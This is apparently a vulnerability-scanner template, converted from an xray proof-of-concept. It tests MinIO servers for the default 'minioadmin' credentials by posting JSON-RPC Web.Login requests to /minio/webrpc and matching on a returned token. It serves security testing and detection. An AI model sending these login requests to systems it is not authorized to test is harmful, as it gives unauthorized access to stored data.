id: poc-yaml-minio-default-password

info:
  name: poc-yaml-minio-default-password
  author: harris2015
  severity: high
  tags: xray-converted,ct-158034
  reference:
    - https://docs.min.io/cn/

http:
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "uiVersion"
          - "token"
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "uiVersion"
          - "token"